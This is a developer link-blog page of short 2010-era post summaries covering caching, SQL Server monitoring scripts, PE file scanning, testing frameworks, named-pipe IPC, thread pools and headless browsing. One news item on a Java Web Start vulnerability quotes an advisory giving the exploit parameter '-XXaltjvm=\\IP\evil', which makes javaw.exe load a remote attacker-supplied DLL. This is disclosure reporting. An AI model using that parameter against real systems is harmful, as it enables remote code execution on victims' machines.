The Runtime Intelligence API library and samples provided by PreEmptive Solutions. Read more: Codeplex
Gear6's Memcached Adds the Best of Both Worlds: MySQL and NoSQL
Posted by jasper22 at 10:37
One technology that continues to push the limits of data caching and massive web persistence is Gear6's Web Caching Server. Think of Gear6 Web Cache as a Memcached distribution on steroids. It can run in the datacenter or the cloud (EC2, GoGrid) while reducing latency and increasing application performance for large Web 2.0 properties. Today, Gear6 announces the completion of a whole new layer of persistence in their Web Cache solution. DZone spoke with Joaquin Ruiz, the VP of Products at Gear6, and Mark Atwood, the Director of Community Development, about the new capabilities in Web Cache. Redis Integration
Gear6's focus was initially on expanding the capabilities of Memcached and its ability to quickly onboard and manage dynamic data. In their research of modern web architectures, Joaquin Ruiz said Gear6 had found many web developers who wanted to persist their mountains of unstructured data in their natural form, instead of force fitting it into an RDBMS. Persistence was especially important with ad-driven sites, said Ruiz. "They were storing hundreds of millions of cookies and they didn't want to instantiate a SQL-driven data structure behind that," said Ruiz. Now Gear6 has shifted its focus towards accelerating structured MySQL data sets in their Memcached server and deploying a NoSQL architecture. Today's release of Gear6 Web Cache integrates their Memcached interface with operational query capabilities and a NoSQL backend. Gear6 decided to use the key-value store Redis because it already had traction among NoSQL users. Mark Atwood said that Gear6 chose a key-value store (as opposed to a document-store or graph database) because it is simple to work with. "Cassandra and CouchDB are very usable and useful, but they're not as straightforward as a key-value store," said Atwood. Gear6 wanted a technology that developers from many different backgrounds could pick up and work with. Read more: DZone
Introducing sys.dm_io_virtual_file_stats
Posted by
jasper22
at
10:30
|
One of the tasks that every SQL Server database administrator for ENOVIA V6 needs to accomplish is the performance monitoring of database data and log files. Often, a DBA needs to understand the performance of their disk I/O and needs something that can break down the disk I/O requests for them. SQL Server 2005 introduced a perfect little dynamic management view that can help you understand the disk I/O requests made through your database by watching these requests at the file level.
How Do I Use This Dynamic Management View?
The sys.dm_io_virtual_file_stats dynamic management view is very easy to use. It takes two parameters: database_id and file_id. To see all databases and all files, simply execute the dynamic management view with NULL parameters. The only hard thing to understand about this dynamic management view is that the information it contains has been accumulating since the last time SQL Server was started. This means that if your instance of SQL Server was started five months ago and a large data load or deletion took place on a database file four months ago that caused disk issues, you will still see that information today. To overcome this cumulative effect, you will need to capture a baseline that includes all previous information and then capture the dynamic management view again on a periodic basis. Once you start capturing the dynamic management view again, simply take the differences to determine what disk I/O has taken place since the baseline or since the last capture. Capturing the information from this dynamic management view is simple enough. The following script creates an audit table and a job that captures the dynamic management view information on a periodic basis. You can then use this audit table to report on your disk I/O usage.
USE master
GO
BEGIN TRY
DROP TABLE file_stats
END TRY
BEGIN CATCH
END CATCH
GO
CREATE TABLE file_stats
(
instance_name VARCHAR(30)
,database_name VARCHAR(255)
,file_id BIGINT
,num_of_reads BIGINT
,num_of_bytes_read BIGINT
,io_stall_read_ms BIGINT
,num_of_writes BIGINT
,num_of_bytes_written BIGINT
,io_stall_write_ms BIGINT
,io_stall BIGINT
,size_on_disk_bytes BIGINT
,insert_date DATETIME DEFAULT GETDATE()
)
/*This script goes into a job that executes once an hour
INSERT INTO file_stats (instance_name,database_name,file_id,
num_of_reads,num_of_bytes_read,io_stall_read_ms,num_of_writes,
num_of_bytes_written,io_stall_write_ms,io_stall,
size_on_disk_bytes)
SELECT @@SERVERNAME,DB_NAME(database_id),file_id,num_of_reads,
num_of_bytes_read,io_stall_read_ms
,num_of_writes,num_of_bytes_written,io_stall_write_ms,
io_stall,size_on_disk_bytes
FROM sys.dm_io_virtual_file_stats(NULL,NULL)
*/
USE [msdb]
GO
/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 12:24:01 ******/
IF EXISTS (SELECT job_id FROM msdb.dbo.sysjobs_view
WHERE name = N'File Stats collection')
EXEC msdb.dbo.sp_delete_job
@job_name = N'File Stats collection', @delete_unused_schedule=1
GO
/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 14:53:36 ******/
BEGIN TRANSACTION
DECLARE @ReturnCode INT
SELECT @ReturnCode = 0
/****** Object: JobCategory [[Uncategorized (Local)]]]
Script Date: 09/03/2009 14:53:36 ******/
IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories
WHERE name=N'[Uncategorized (Local)]' AND category_class=1)
BEGIN
EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB',
@type=N'LOCAL', @name=N'[Uncategorized (Local)]'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback END
Read more: Dassault Systèmes ENOVIA V6 on SQL Server
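As an illustration of the baseline-and-difference step described above, here is a minimal C# (ADO.NET) sketch of my own, not part of the original article, that takes two snapshots of the DMV and prints the per-file deltas. The connection string and sampling interval are placeholders.

using System;
using System.Collections.Generic;
using System.Data.SqlClient;
using System.Threading;

class FileStatsDelta
{
    const string Query =
        "SELECT DB_NAME(database_id), file_id, num_of_reads, num_of_writes, io_stall " +
        "FROM sys.dm_io_virtual_file_stats(NULL, NULL)";

    // One entry per database file: [num_of_reads, num_of_writes, io_stall]
    static Dictionary<string, long[]> Snapshot(SqlConnection conn)
    {
        var snap = new Dictionary<string, long[]>();
        using (var cmd = new SqlCommand(Query, conn))
        using (var reader = cmd.ExecuteReader())
        {
            while (reader.Read())
            {
                string key = reader.GetString(0) + ":" + reader.GetValue(1);  // db:file_id
                snap[key] = new[] { reader.GetInt64(2), reader.GetInt64(3), reader.GetInt64(4) };
            }
        }
        return snap;
    }

    static void Main()
    {
        // Placeholder connection string - point it at the instance you want to watch.
        using (var conn = new SqlConnection("Server=.;Integrated Security=true"))
        {
            conn.Open();
            var baseline = Snapshot(conn);
            Thread.Sleep(TimeSpan.FromMinutes(1));   // illustrative sampling interval
            var current = Snapshot(conn);

            foreach (var kvp in current)
            {
                long[] before;
                if (!baseline.TryGetValue(kvp.Key, out before)) continue;
                Console.WriteLine("{0}: reads +{1}, writes +{2}, stall +{3} ms",
                    kvp.Key, kvp.Value[0] - before[0], kvp.Value[1] - before[1], kvp.Value[2] - before[2]);
            }
        }
    }
}

The same arithmetic applies to the audit table the job fills: subtract each file's previous row from its latest row to see the I/O incurred since the last capture.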
IronBrainFuck, SimpleBrainFuck
Posted by
jasper22
at
10:28
|
IronBrainFuck and SimpleBrainFuck make it easier for BrainFuck programmers to develop BrainFuck-compatible programs. They are developed in C# using GPPG. Read more: Codeplex
April 2010 Security Release ISO Image
Posted by
jasper22
at
10:27
|
This DVD5 ISO image file contains the security updates for Windows released on Windows Update on April 13th, 2010. The image does not contain security updates for other Microsoft products. This DVD5 ISO image is intended for administrators that need to download multiple individual language versions of each security update and that do not use an automated solution such as Windows Server Update Services (WSUS). You can use this ISO image to download multiple updates in all languages at the same time. Important: Be sure to check the individual security bulletins at http://www.microsoft.com/technet/security prior to deployment of these updates to ensure that the files have not been updated at a later date. Read more: MS Download
How to implement UI testing without shooting yourself in the foot
Posted by
jasper22
at
10:26
|
I’m currently interviewing lots of teams that have implemented acceptance testing for my new book. A majority of those interviewed so far have at some point shot themselves in the foot with UI test automation. After speaking to several people who are about to do exactly that at the Agile Acceptance Testing Days in Belgium a few weeks ago, I’d like to present what I consider a very good practice for how to do UI test automation efficiently. I’ve written against UI test automation several times so far, so I won’t repeat myself. However, many teams I interviewed seem to prefer UI-level automation, or think that such a level of testing is necessary to prove the required business functionality. Almost all of them have realised six to nine months after starting this effort that the cost of maintaining UI-level tests is higher than the benefit they bring. Many have thrown away the tests at that point and effectively lost all the effort they put into them. If you have to do UI test automation (which I’d challenge in the first place), here is how to go about doing it so that the cost of maintenance doesn’t kill you later.
Three levels of UI test automation
A very good idea when designing UI-level functional tests is to think about describing the test and the automation at these three levels:
* Business rule/functionality level: what is this test demonstrating or exercising. For example: Free delivery is offered to customers who order two or more books.
* User interface workflow level: what does a user have to do to exercise the functionality through the UI, on a higher activity level. For example, put two books in a shopping cart, enter address details, verify that delivery options include free delivery.
* Technical activity level: what are the technical steps required to exercise the functionality. For example, open the shop homepage, log in with “testuser” and “testpassword”, go to the “/book” page, click on the first image with the “book” CSS class, wait for page to load, click on the “Buy now” link… and so on. Read more: Gojko Adzic
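To make the layering concrete, here is a small C# sketch of those three levels. It is my own illustration rather than code from the article: BrowserDriver is a hypothetical stub standing in for whatever UI automation tool you use, and only that lowest layer knows about URLs, CSS classes and clicks.

using System;
using System.Collections.Generic;

// Level 3: technical activities. A hypothetical stub; in real life this wraps
// a UI automation tool (WatiN, Selenium, etc.).
class BrowserDriver
{
    public void Open(string url)                 { Console.WriteLine("open " + url); }
    public void ClickFirstWithClass(string cls)  { Console.WriteLine("click ." + cls); }
    public void ClickLink(string text)           { Console.WriteLine("click link '" + text + "'"); }
    public void Type(string field, string value) { Console.WriteLine("type '" + value + "' into " + field); }
    public List<string> ReadListItems(string id) { return new List<string> { "Free delivery" }; } // stubbed result
}

// Level 2: user-interface workflow, expressed as user activities.
class ShopWorkflow
{
    readonly BrowserDriver _browser = new BrowserDriver();

    public void PutBooksInCart(int count)
    {
        for (int i = 0; i < count; i++)
        {
            _browser.Open("/book");
            _browser.ClickFirstWithClass("book");
            _browser.ClickLink("Buy now");
        }
    }

    public void EnterAddressDetails(string address) { _browser.Type("address", address); }

    public List<string> DeliveryOptions() { return _browser.ReadListItems("delivery-options"); }
}

// Level 1: the business rule - free delivery is offered for two or more books.
class FreeDeliveryTest
{
    static void Main()
    {
        var shop = new ShopWorkflow();
        shop.PutBooksInCart(2);
        shop.EnterAddressDetails("10 Example Street");
        Console.WriteLine(shop.DeliveryOptions().Contains("Free delivery")
            ? "PASS: free delivery offered"
            : "FAIL: free delivery not offered");
    }
}

Keeping the business rule at the top and pushing clicks and selectors to the bottom layer is what keeps the maintenance cost of UI tests under control when the markup changes.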
Visual Basic Language Specification 10.0
Posted by
jasper22
at
10:25
|
The Visual Basic Language Specification provides a complete description of the Visual Basic language 10.0. Read more: MS Download
Patterns and Practices for parallel programming in C++
Posted by
jasper22
at
10:24
|
This document provides a detailed exploration of common patterns of parallelism and how they can be expressed with the Parallel Patterns Library, the Asynchronous Agents Library, and the Concurrency Runtime within Visual Studio 2010. This includes a discussion of best practices around the use of these libraries as well as cautions around practices yielding less than optimal behavior. Read more: MS Download
A Number of Reusable PE File Format Scanning Functions
Posted by
jasper22
at
10:24
|
This article accompanies a number of command line sample applications that wrap some common code of mine. This common code can be used to extract various information from PE files. The four samples are named bitness, pefileuses, dotnetsearch and pdbget. bitness expects a file name as the command line parameter and will tell you if the file passed as an argument is a 32 bit or a 64 bit PE file. It wraps the following common code functions:
BOOL IsFile64BitPEFileW(LPCWSTR szFile, PBOOL pbIs64Bits);
BOOL IsFile64BitPEFileA(LPCSTR szFile, PBOOL pbIs64Bits);
The parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. In case of success, the out-parameter pbIs64Bits will contain a non-zero value if the PE file passed as parameter szFile is 64 bits. pefileuses is meant to determine if a given PE file links against a certain DLL or uses a function from a given DLL. It expects 3 command line parameters and optionally a fourth parameter. The first parameter is a number between zero and 2. This number determines whether the import table or the table for delayloaded functions should be scanned, or both. Passing "0" means both tables are scanned, passing "1" means only the import table is scanned, and passing "2" means only the table for delayloads is scanned. The second parameter is the PE file to be scanned. The third parameter denotes the DLL name that the tables should be scanned for. Finally, the fourth parameter is an optional function name. The application will print on stdout whether or not the specified binary links against the given DLL or even uses the optional function name. This tool wraps the following common code functions:
BOOL __stdcall PeFileUsesImportA(LPCSTR szPeFile, LPCSTR szDllName,
                                 LPCSTR szFunction,
                                 PBOOL pbUse, DWORD dwFlags);
BOOL __stdcall PeFileUsesImportW(LPCWSTR szPeFile, LPCWSTR szDllName,
                                 LPCWSTR szFunction, PBOOL pbUse,
                                 DWORD dwFlags);
The flags to be passed to this function are those that are passed as the first parameter to pefileuses.exe and are defined as such:
#define PUI_USE_IMPORT_ONLY    0x1
#define PUI_USE_DELAYLOAD_ONLY 0x2
Passing 0L as the dwFlags parameter scans both tables as described above. The other parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. dotnetsearch is a tool to scan an entire directory tree and evaluate each DLL and EXE file found, whether it is a .NET binary. Read more: Codeproject
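For readers who want the same bitness check from managed code, here is a small C# sketch of my own (not the article's library) that reads the PE header's Machine field directly; the path in the usage comment is just an example.

using System;
using System.IO;

static class PeBitness
{
    public static bool IsPe64Bit(string path)
    {
        using (var fs = File.OpenRead(path))
        using (var br = new BinaryReader(fs))
        {
            if (br.ReadUInt16() != 0x5A4D)              // "MZ" DOS signature
                throw new BadImageFormatException("Not a PE file", path);

            fs.Seek(0x3C, SeekOrigin.Begin);            // e_lfanew: offset of the PE header
            uint peOffset = br.ReadUInt32();

            fs.Seek(peOffset, SeekOrigin.Begin);
            if (br.ReadUInt32() != 0x00004550)          // "PE\0\0" signature
                throw new BadImageFormatException("Missing PE signature", path);

            ushort machine = br.ReadUInt16();           // IMAGE_FILE_HEADER.Machine
            return machine == 0x8664 /* AMD64 */ || machine == 0x0200 /* IA64 */;
        }
    }
}

// Usage (example path): Console.WriteLine(PeBitness.IsPe64Bit(@"C:\Windows\System32\notepad.exe"));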
Why support more? The story of MSTest…
Posted by
jasper22
at
09:44
|
With the new Visual Studio comes another version of Microsoft’s unit testing framework. This is Microsoft’s take on how unit testing should be done, and they got a few things right – as always it’s fully integrated with Visual Studio, and with the new version come two exciting new features: 1. Run tests as a 64-bit process – at last I’m able to test that my code works in x64 as well
2. Parallel execution – run your test suite in half/a quarter of the time!
Yet given a choice I still prefer to work with NUnit, and I have a few good reasons – the last straw was Microsoft’s decision not to support multi-targeting of the test framework.
What does it mean?
Not supporting multi-targeting means that once you’ve used VS2010 to run your tests, they will automatically be converted to .NET 4, which means that you won’t be able to run them using older versions of Visual Studio – if you want to read more, have a look at this bug report turned feature. In one of the projects I work on we need to be able to run the same test suite on VS2008 and VS2010 – but we just can’t; we need to maintain two projects just to be able to run the same tests.
So what?
Although this is not such a big deal, it seems to me that similar decisions can be found at every step MSTest has taken along the road. For example, ExpectedException not being able to verify the exception message – by design, but it still has a message property used for “informative purposes”. Why put in a property I’m used to from other frameworks and change the way it works – that’s just confusing. And not to mention the fact that from time to time I get a bonus – instead of running just the tests in a specific context, all of my tests are run. Read more: Helper Code
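To illustrate the ExpectedException point, here is a hedged C# sketch comparing the two styles; attribute and class names are fully qualified because both frameworks define similar types, and it assumes references to both MSTest and NUnit.

using System;

// In MSTest the string on ExpectedException is informational: it is displayed
// when no exception is thrown at all, not compared against the exception's
// message. NUnit's Assert.Throws returns the exception, so the message can be
// verified explicitly.

[Microsoft.VisualStudio.TestTools.UnitTesting.TestClass]
public class MsTestStyle
{
    [Microsoft.VisualStudio.TestTools.UnitTesting.TestMethod]
    [Microsoft.VisualStudio.TestTools.UnitTesting.ExpectedException(
        typeof(InvalidOperationException), "displayed only if nothing is thrown")]
    public void Withdraw_WithNoFunds_Throws()
    {
        throw new InvalidOperationException("insufficient funds"); // message is never checked
    }
}

[NUnit.Framework.TestFixture]
public class NUnitStyle
{
    [NUnit.Framework.Test]
    public void Withdraw_WithNoFunds_Throws_WithExpectedMessage()
    {
        var ex = NUnit.Framework.Assert.Throws<InvalidOperationException>(
            () => { throw new InvalidOperationException("insufficient funds"); });
        NUnit.Framework.Assert.AreEqual("insufficient funds", ex.Message);
    }
}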
IBM Patents Optimization
Posted by
jasper22
at
09:17
|
IBM appears to want to patent optimizing programs by trial and error, which in the history of programming has, of course, never been done. Certainly, all my optimizations have been the result of good planning. Well done IBM for coming up with this clever idea. What is claimed is: 'A method for developing a computer program product, the method comprising: evaluating one or more refactoring actions to determine a performance attribute; associating the performance attribute with a refactoring action used in computer code; and undoing the refactoring action of the computer code based on the performance attribute. The method of claim 1 wherein the undoing refactoring is performed when the performance attribute indicates a negative performance effect of the computer code. Read more: Slashdot
Block by country
Getting visitors you really don't want to have on your site? You can now block them easily with our free blocking service. Simply select the countries you want to block from your website and press the "Go" button. Then, in step 3, .htaccess information is generated for you. Copy and paste this generated code into your .htaccess document and visitors from the selected countries will not be able to access your website. Read more: Block a country
Review of Adobe Creative Suite 5
Posted by
jasper22
at
13:52
|
Adobe today updated its Creative Suite software to version 5, and PC Pro has an absolutely massive collection of reviews. Along with an overview of the entire suite, from Design to Web to Production bundles, every individual component gets the full in-depth treatment. It includes video demonstrations of Photoshop CS5's fabulous Content-Aware fill trick and new Puppet Warp function; a long-awaited step up to 64-bit for Premiere Pro CS5; and big updates to Dreamweaver CS5, After Effects CS5, and the rest. Read more: Slashdot
Serious New Java Flaw Affects All Current Versions of Windows
Posted by
jasper22
at
13:45
|
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years. The problem lies in the Java Web Start framework, a technology that Sun Microsystems developed to enable the simplified deployment of Java applications. In essence, the JavaWS technology fails to validate parameters passed to it from the command line, and attackers can control those parameters using specific HTML tags on a Web page, researcher Ruben Santamarta said in an advisory posted Friday morning. Tavis Ormandy posted an advisory about the same bug to the Full Disclosure mailing list on Friday as well. Ormandy said in his advisory that disabling the Java plugin is not enough to prevent exploitation, because the vulnerable component is installed separately. In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw. "Java.exe and javaw.exe support an undocumented, hidden command-line parameter "-XXaltjvm" and curiously also "-J-XXaltjvm" (see the -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil; in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory. Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable. Read more: threat post
Daily Dose - Novell Keeps Unix Copyrights; Linux is Safe
Posted by
jasper22
at
11:04
|
A US federal judge ruled on Tuesday that Novell owns the Unix copyrights, and not SCO. In the 7-year court battle, SCO claimed that the copyrights transferred from their predecessor, the Santa Cruz Operation, to them. In the court ruling, the judge said that the copyrights never transferred to the Santa Cruz Operation in the first place. Tuesday's ruling was a key victory for IBM, who would have faced a multibillion dollar lawsuit had SCO won, and for Linux users, who could have been subject to fees if SCO had gotten the copyrights. SCO's open source enemies will be glad to know that the long trial has depleted the company's resources. They are currently under bankruptcy court protection and this recent legal defeat could be the final nail in the coffin.
US Cybersecurity Act "Kill Switch" Removal Questioned
In August, the US Cybersecurity Bill was met with harsh criticism because it allowed the President to shut down internet traffic by seizing private networks. The new draft, which passed last week, has removed the explicit "kill switch" language from the bill, but Donny Shaw's blog has led many to believe that the President would still possess "kill switch" power under the new bill. Shaw says that the language is still vague, and does not limit what the President can do in an "emergency response and restoration." This is a plan (replacing the "kill switch") that the President would develop by collaborating with government agencies and private industries. A cybersecurity emergency response may be declared "in the event of an immediate threat to strategic national interests involving compromised Federal Government or United States critical infrastructure information systems." This seems to indicate that the President would only be able to declare an emergency if there were a cyber threat to US critical systems. It's unlikely that we'll see the government shutting down newspapers or any other subversive websites anytime soon. Read more: DZone
Use Named Pipes and Shared Memory for inter process communication with a child process or two
Posted by
jasper22
at
11:03
|
I wanted to inject some very low impact code that would run in any “parent” process, like Notepad or Excel or Visual Studio. I wanted to have some User Interface for the data that my injected code gathered about the parent process, and that would work best in a different “child” process, preferably using WPF. In the old days, I could call a COM server to handle the job. A DLL server would be in process, but it could be made out of process by making it a COM+ application (see Blogs get 300 hits per hour: Visual FoxPro can count. and Create multiple threads from within your application). .Net Remoting seemed to be a little heavyweight for Parent->Child process communication. About 5 years ago, I wrote this: Use Named Pipes to communicate between processes or machines, so I thought I’d use a combination of Named Pipes and Shared Memory. Luckily .Net 3.5 added support for Named Pipes, making the child process pretty simple. Pipes could be used to send messages, and the lion’s share of data movement could be in the Shared Memory. Synchronization and lifetime management are a little tedious. We want the parent process to continue optionally if the child process terminates, but we want the child to terminate automatically when the parent terminates for any reason. Similarly, the child process should terminate if the parent has gone. This sample shows a parent process in C++ and 2 child processes in C# and VB. The parent spins off a thread to service incoming requests from the children. Events are used to synchronize communication. A timer in each child process fires off requests to the parent. I was using Visual Studio 2010: you can use VS 2008, but you’ll have to adjust for some of the new features I use, especially in the VB code.
Start Visual Studio. File->New->Project->C++ Win32 Project->Windows Application. In the wizard, click Add common header files for ATL. Now hit F5 to build and see it execute: there’s a window and a couple of menus. Now add a second EXE project to your solution: choose File->Add->New Project->VB WPF Application. (Repeat to add a 3rd project for C#!) Fiddle with the Project->Properties->Compile->Build Output path so it builds into the same folder as the parent exe (for me, it was “..\Debug\”). Paste the VB code below into MainWindow.Xaml.Vb. Somewhere inside the _tWinMain of your CPP project, add these 2 lines to instantiate a class that calls the WpfApplication as a child process, with a shared memory size of 2048 (make sure to change the name of the EXE to match your VB and C# EXEs):
CreateChildProcess opCreateChildProcessCS(_T("NamedPipesCS.exe"),2048, 1);
CreateChildProcess opCreateChildProcessVB(_T("NamedPipesVB.exe"),2048, 2);
Paste the CPP code below before the _tWinMain. F5 will show both processes launched. You can alt-tab between the 2: they behave like independent processes. Try terminating one of them.
If you uncomment the MsgBox, then hit F5, you can actually use VS to attach to a child process before it does too much. Try attaching to all 3! See also:
<C++ Code>
// CreateChildProcess : class in parent process to instantiate and communicate with a child process
// usage: CreateChildProcess opCreateChildProcess(_T("WpfApplication1.exe"),2048);
class CreateChildProcess
{
HANDLE m_hChildProcess;// handle to the child process we create
HANDLE m_hNamedPipe; // handle to the named pipe the parent process creates
HANDLE m_hEvent;
HANDLE m_hThread; // thread in parent process to communicate with child
LPVOID m_pvMappedSection;
DWORD m_cbSharedMem;
public: CreateChildProcess(TCHAR* szChildExeFileName,DWORD cbSharedMemSize, int ChildNo )
{
m_cbSharedMem = cbSharedMemSize;
TCHAR szPipeName[1000];
TCHAR szEventName[1000];
swprintf_s(szPipeName, L"Pipe%d_%d", ChildNo, GetCurrentProcessId()); //make the names unique per child and per our (parent) process
swprintf_s(szEventName,L"Event%d_%d", ChildNo, GetCurrentProcessId()); //
SECURITY_ATTRIBUTES SecurityAttributes = {
sizeof( SECURITY_ATTRIBUTES ), // nLength
NULL, // lpSecurityDescriptor. NULL = default for calling process
TRUE // bInheritHandle
};
Read more: Calvin Hsia's WebLog
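As a rough sketch of the child side only (my own simplification, not Calvin's actual sample), a .NET 3.5 child can open the parent's pipe with NamedPipeClientStream. The pipe name below mirrors the "Pipe<childNo>_<parentPid>" convention built in the C++ constructor above; the child number and the way the parent PID is passed in are placeholders.

using System;
using System.IO.Pipes;
using System.Text;

class ChildPipeClient
{
    static void Main(string[] args)
    {
        int childNo = 1;                                            // placeholder
        int parentPid = int.Parse(args.Length > 0 ? args[0] : "0"); // assumed to be passed by the parent
        string pipeName = string.Format("Pipe{0}_{1}", childNo, parentPid);

        using (var pipe = new NamedPipeClientStream(".", pipeName, PipeDirection.InOut))
        {
            pipe.Connect(5000);                                     // wait up to 5s for the parent

            byte[] request = Encoding.Unicode.GetBytes("hello from child");
            pipe.Write(request, 0, request.Length);

            byte[] buffer = new byte[1024];
            int read = pipe.Read(buffer, 0, buffer.Length);
            Console.WriteLine("Parent replied: " + Encoding.Unicode.GetString(buffer, 0, read));
        }
    }
}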
General Guidance for SQL Server on Virtualisation
Posted by
jasper22
at
10:58
|
I have been on about four engagements in a row this year where we are looking at SQL performance on VMWare or Hyper-V. Here is a list of common things that you can do with virtualisation that may adversely affect SQL performance. Most of them also apply to physical environments, for example if you are consolidating SQL onto multiple instances.
* Using a large shared disk group for all virtual workloads
* Mounting the VHD to VMWare disk on a server file system (instead of pass-through disks)
* Using a large disk pool when only one controller can own the disk group (some SAN’s are limited in this way and some are not)
* Overcommitting CPU
* Overcommitting Memory
* Not using 64k block size and allocation unit size
* Not using Volume alignment (on guest and host)
* Using dynamic disks (much better in Hyper-V R2, but still not generally recommended)
* Not ensuring Logs are on dedicated spindles
* Not using multiple HBA channels on larger workloads
* Sharing a switch between data, network and CSV
* Not using CPU affinity (some virtualisation platforms support affinity)
* Not using an “enlightened” operating system (Hyper-V)
* Running multiple VM’s on a single host slightly decreases throughput, but this is kinda the point of virtualisation so hard to avoid.
* Running lots of SQL Servers on one host and having too few HBA cards or a low queue depth
* Running a 32 bit SQL Server guest on workloads that need a lot of memory.
* Not pre-sizing TempDB
* Not planning for database growth events
The top item (use of a shared disk group) is a very common configuration for disks, especially when using clustered shared disk volumes. But we know they will adversely affect performance, so what to do? Ban these configurations? Read more: Bob Duffy's Blobby Blog
BlogEngine.NET Themes
Posted by
jasper22
at
10:57
|
A collection of every single theme pack for BlogEngine.net that can be found. Read more: Codeplex
Win32 Thread Pool
Posted by
jasper22
at
10:56
|
What is a thread pool? Exactly that, a pool of threads. You may have heard of terms like object pooling, thread pooling, car pooling (oops); anyway, the idea behind pooling is that you can re-use the objects, which may be threads or database connections or instances of some class. Now why would we ever want to re-use such things? The most important reason would be that creating such an object might take up a lot of resources or time, so we do the next best thing. We create a bunch of them initially and call the bunch a pool. Whenever someone (some code) wants to use such an object, instead of creating a new one, it gets it from the already existing bunch (pool).
Background
Usually when I develop something, there is a fairly good reason behind it, like my project demanded it or I did it for someone who asked me about it, but this thread pool was a result of neither of these. Actually, around a year back, I had attended an interview with a company where I was asked this question. Well, at that time I didn't really think of it seriously, but a few days back the question came back to me, and this time I decided it was time to get my answer working.
Using the Code
Main Files
* threadpool.h & threadpool.cpp - defines the CThreadPool class. This class is the main class which provides the thread pooling facilities.
* ThreadPoolAppDlg.cpp - see the OnOK() method. This method makes use of the thread pool. This example was written using VC++ 6.0. The source has now been updated for Visual Studio 2008. The thread pool class itself does not make use of any MFC classes so you should be able to use the thread pool for pure Win32 applications also. Read more: Codeproject
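For comparison only, and not part of the article's C++ class, the same pooling idea is built into the .NET runtime. A tiny C# sketch that queues work items onto pre-created, re-used threads:

using System;
using System.Threading;

class ThreadPoolDemo
{
    static void Main()
    {
        using (var done = new CountdownEvent(5))
        {
            for (int i = 0; i < 5; i++)
            {
                int taskId = i;
                ThreadPool.QueueUserWorkItem(_ =>
                {
                    // Runs on a pooled thread, not on a thread created per task.
                    Console.WriteLine("Task {0} on pooled thread {1}",
                        taskId, Thread.CurrentThread.ManagedThreadId);
                    done.Signal();
                });
            }
            done.Wait();   // wait for all queued work items to finish
        }
    }
}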
Becoming a Windows Search Ninja - “Mastering Windows Search using Advanced Query Syntax”
Posted by
jasper22
at
10:55
|
Search has become an integral part of Windows, particularly in later versions. While the major search improvements began with Windows Vista and were backported to Windows XP, it's really only with Windows 7 that the larger majority of users are discovering the search bar all over the operating system. Search is built into every aspect of Windows 7 to help users cope with the rapidly growing number of files, be they work documents and e-mails, personal photos and videos, or music collections. Many users perform searches without thinking nowadays: it's an ingrained habit of using the operating system. Like many habits, this one is worth breaking in order to develop an even better one. Here we take a quick look at a few basic search techniques and a few more advanced ones. Force yourself to use them and you'll soon become a master of Windows Search. A bit of extra time now will save you loads of effort in the long run. Read more: Greg's Cool [Insert Clever Name] of the Day
Finding meaningful error details to report execution failures
Posted by
jasper22
at
10:54
|
Today a friend of mine asked for a hand with an SSRS error he was getting. I have to admit, at the time I was pretty busy and feel bad that I didn’t answer the question completely. The error was resolved though, and the find/fix by him was impressive to say the least. One thing that was frustrating for both of us was the error presented from the report server when this particular report execution failed. In short, the error was not helpful at all. There is a way to find more in-depth descriptions of the error, though, by turning to the trace logs that are enabled on Reporting Services. Below, we will go through searching for these descriptive errors in the logs. On the report server, navigate through the directory structure to the installation folders for the SSRS binary files. In these folders you will find a folder named LogFiles. This folder will house the default report server trace logs. All execution trace events will be logged in these flat files and can be excellent information for troubleshooting report execution issues. After understanding the trace files, it is also a great way to utilize SSIS to import and report off of them to be more proactive on the report executions. To read in-depth on the trace logs see "Report Server Service Trace Log". Learning how the log files are recycled can be key to finding the file that will help you in a troubleshooting session. The following extract from the BOL documentation explains just how this process is handled. "The trace log file is ReportServerService_.log. The trace log is an ASCII text file. You can use any text editor to view the file. This file is located at \Microsoft SQL Server\\Reporting Services\LogFiles. The trace log is created daily, starting with the first entry that occurs after midnight (local time), and whenever the service is restarted. The timestamp is based on Coordinated Universal Time (UTC). The file is in EN-US format. By default, trace logs are limited to 32 megabytes and deleted after 14 days." Knowing the recycle times and when a new log is created can lower the length of time spent searching them for the error needed. Read more: LessThanDot
Using HtmlUnit on .NET for Headless Browser Automation
Posted by
jasper22
at
10:53
|
If you subscribe to this blog, you may have noticed that I’ve been writing about test automation methods a lot lately. You could even think of it as a series covering different technical approaches:
* Hosting your app in a real web server and testing it through a real web browser using WatiN (plus, in this case, SpecFlow for Cucumber-style specifications)
* Hosting your app in a real web server and testing it with client-side automation using Microsoft’s Lightweight Test Automation Framework
* Hosting your app directly in the test suite process and bypassing both the web server and the browser entirely using my MvcIntegrationTestFramework experiment
* Unit testing code in isolation – best and worst practices, and why I think unit testing isn’t applicable to all types of code
* Injecting code across process boundaries to assist integration testing approaches that host your app in a real web server, using Deleporter
The reason I keep writing about this is that I still think it’s very much an unsolved problem. We all want to deliver more reliable software, we want better ways to design functionality and verify implementation… but we don’t want to get so caught up in the bureaucracy of test suite maintenance that it consumes all our time and obliterates productivity.
Yet another approach
Rails developers (and to a lesser extent Java web developers) commonly use yet another test automation technique: hosting the app in a real web server, and accessing it through a fast, invisible, simulated web browser rather than a real browser. This is known as headless browser automation. Read more: Steve Sanderson’s blog
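To give a feel for what headless browsing looks like from C#, here is a hedged sketch. HtmlUnit is a Java library, so on .NET it is usually consumed through IKVM-converted assemblies; the namespaces below are the Java package names exposed that way, and the URL and link text are placeholders.

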